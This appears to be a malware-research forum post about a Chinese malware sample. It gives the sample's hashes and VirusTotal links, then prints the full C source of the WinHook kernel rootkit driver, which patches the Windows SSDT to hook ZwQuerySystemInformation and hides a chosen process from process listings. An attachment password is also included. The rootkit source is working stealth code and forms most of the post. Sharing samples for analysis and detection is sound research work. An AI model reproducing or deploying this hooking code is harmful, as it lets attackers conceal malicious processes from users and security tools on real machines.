Piece of malware from China with a rootkit on board. It is nothing interesting except for the fact that it is built from an open-source rootkit called "WinHook". The malware author only added one more SSDT hook, for NtSetInformationFile. The complete source is also below.
SHA256: 850f66e860231d8681cdb6531a11eb1d96219181097b092f7ab47dab3a0fe5d7
SHA1: 565280d0883c9b7fc89a55d8bf9ac646f1e3bf33
MD5: 0741d6e8d6008a0461ceae1c9f85ad7f
https://www.virustotal.com/en/file/850f ... /analysis/
SHA256: 850f66e860231d8681cdb6531a11eb1d96219181097b092f7ab47dab3a0fe5d7
SHA1: 565280d0883c9b7fc89a55d8bf9ac646f1e3bf33
MD5: 0741d6e8d6008a0461ceae1c9f85ad7f
https://www.virustotal.com/en/file/850f ... /analysis/
/* ******************************************************************
Name:WinHook.c
Hooks a system service call on Windows 2000 or later, only
for x86 CPUs. This driver only hides the process that you set!
Copyright (C) ndis 2004, All rights reserved.
****************************************************************** */
#include <ntddk.h>
#include "WinHook.h"
/* ******************************************************************
Macro for easy hook/unhook. On X86 implementations of Zw* func-
tions, the DWORD following the first byte is the system call number,
so we reach into the Zw function passed as a parameter, and pull the
number out. This makes system call hooking dependent ONLY on the
Zw* function implementation not changing.
****************************************************************** */
#define SYSCALL(_function) ServiceTable->ServiceTable[*(PULONG)((PUCHAR)_function+1)]
/* Pointer to system global service table */
PSRVTABLE ServiceTable;
#pragma code_seg("ENTRY")
/* Driver Entry */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{
NTSTATUS nRet;
PDEVICE_OBJECT lpHookDeviceObject;
UNICODE_STRING uszDeviceName,uszDriverName;
RtlInitUnicodeString(&uszDeviceName,L"\\Device\\WinHook");
RtlInitUnicodeString(&uszDriverName,L"\\DosDevices\\WinHook");
nRet = IoCreateDevice(
DriverObject, 0,
&uszDeviceName,
FILE_DEVICE_WINHOOK,
0, TRUE,
&lpHookDeviceObject
);
if(NT_SUCCESS(nRet)){
/* Create Symboliclink for GUI */
nRet = IoCreateSymbolicLink (&uszDriverName, &uszDeviceName );
/* Create dispatch points for all routines */
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] =
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DriverDispatch;
DriverObject->DriverUnload = DriverUnload;
}
if(!NT_SUCCESS(nRet)){
DbgPrint("******WinHook:Failed to create device!******\n");
if(lpHookDeviceObject){
IoDeleteDevice(lpHookDeviceObject);
}
IoDeleteSymbolicLink(&uszDriverName);
return nRet;
}
/* Pointer to system table data structure is an NTOSKRNL export */
ServiceTable = KeServiceDescriptorTable;
DbgPrint("WinHook:SystemCallService: %x\n",ServiceTable);
/* Install System Call Hook */
HookSystemCall();
DbgPrint("******WinHook:Hook System Call Service******\n");
return STATUS_SUCCESS;
}
#pragma code_seg()
#pragma code_seg("SETHOOK")
/* Install System Call Hook */
VOID HookSystemCall()
{
RealZwQuerySystemInformation = SYSCALL(ZwQuerySystemInformation);
SYSCALL(ZwQuerySystemInformation) = (PVOID)HookZwQuerySystemInformation;
return;
}
#pragma code_seg()
#pragma code_seg("UNHOOK")
/* Uninstall System Call Hook */
VOID UnhookSystemCall()
{
SYSCALL(ZwQuerySystemInformation) = (PVOID)RealZwQuerySystemInformation;
return;
}
#pragma code_seg()
#pragma code_seg("HOOK")
/* Hook function: hooks ZwQuerySystemInformation to hide the process you set. */
NTSTATUS HookZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength
)
{
NTSTATUS nRet;
UNICODE_STRING uszProcName;
RtlInitUnicodeString(&uszProcName, L"winlogon.exe");
nRet = (RealZwQuerySystemInformation)(
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength
);
if(NT_SUCCESS(nRet))
{
if(SystemInformationClass==5)
{
struct _SYSTEM_PROCESSES *lpCurr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *lpPrev = NULL;
if(lpCurr->NextEntryDelta){
((char *)lpCurr += lpCurr->NextEntryDelta);
}
while(lpCurr)
{
/* Hide the process you setting */
if (RtlCompareUnicodeString(&uszProcName, &lpCurr->ProcessName, 1) == 0)
{
if(lpPrev)
{
if(lpCurr->NextEntryDelta) {
lpPrev->NextEntryDelta += lpCurr->NextEntryDelta;
}
else {
lpPrev->NextEntryDelta = 0;
}
}
else {
if(lpCurr->NextEntryDelta) {
(char *)SystemInformation += lpCurr->NextEntryDelta;
}
else {
SystemInformation = NULL;
}
}
if(lpCurr->NextEntryDelta){
((char *)lpCurr += lpCurr->NextEntryDelta);
}
else {
lpCurr = NULL;
break;
}
} /* if (RtlCompareUnicodeString(&uszProcName, &lpCurr->ProcessName, 1) == 0) */
/* View all over the process list */
if(lpCurr != NULL) {
lpPrev = lpCurr;
if(lpCurr->NextEntryDelta){
((char *)lpCurr += lpCurr->NextEntryDelta);
}
else{
lpCurr = NULL;
}
}
} /* end while(lpCurr) */
} /* End if(SystemInformationClass==5) */
} /* End if(NT_SUCCESS(nRet)) */
return nRet;
}
#pragma code_seg()
#pragma code_seg("PATCH")
/* Driver Dispatch */
NTSTATUS DriverDispatch(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp)
{
PIO_STACK_LOCATION lpIrpStack;
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
/* Get a pointer to the current location in the Irp. */
lpIrpStack =IoGetCurrentIrpStackLocation(Irp);
switch (lpIrpStack->MajorFunction) {
case IRP_MJ_CREATE:
case IRP_MJ_SHUTDOWN:
case IRP_MJ_CLOSE:
case IRP_MJ_DEVICE_CONTROL:
DbgPrint("WinHook Dispatch\n");
break;
}
IoCompleteRequest(Irp,IO_NO_INCREMENT);
return STATUS_SUCCESS;
}
#pragma code_seg()
#pragma code_seg("UNLOAD")
/* Driver Unload */
VOID DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING uszDriverName;
DbgPrint("******WinHook Driver Unloading******\n");
/* Uninstall System Call Hook */
UnhookSystemCall();
/* Delete the symbolic link for this device */
RtlInitUnicodeString(&uszDriverName,L"\\DosDevices\\WinHook");
IoDeleteSymbolicLink(&uszDriverName);
/* Delete the device object */
IoDeleteDevice( DriverObject->DeviceObject );
DbgPrint("******Deleted devices******\n");
return;
}
#pragma code_seg()
Attachments
pass: malware